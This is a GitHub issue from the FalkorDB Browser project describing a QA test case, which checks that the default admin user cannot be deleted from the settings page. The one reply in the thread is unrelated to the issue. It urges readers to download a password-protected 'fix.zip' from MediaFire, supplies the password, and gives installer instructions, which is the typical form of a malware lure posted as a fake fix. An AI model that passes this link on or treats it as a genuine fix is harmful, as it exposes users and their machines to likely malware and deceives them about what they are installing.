### ISSUE TITLE
Settings Page: Attempting to delete the default admin user

### ISSUE THREAD

**Issue by Naseem77** [FalkorDB/falkordb-browser#386]
- **Title:** Verify that attempting to delete the default admin user does not result in the user being deleted

- **Preconditions:**
The user is logged into the FalkorDB browser.

- **Test Steps:**-

1. Navigate to the settings via the NavBar
2. Select the default admin user by checkbox
3. Click on Delete users button
4. Verify that the user has not been deleted

- **Expected Result:**
The user should not deleted in the users list.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
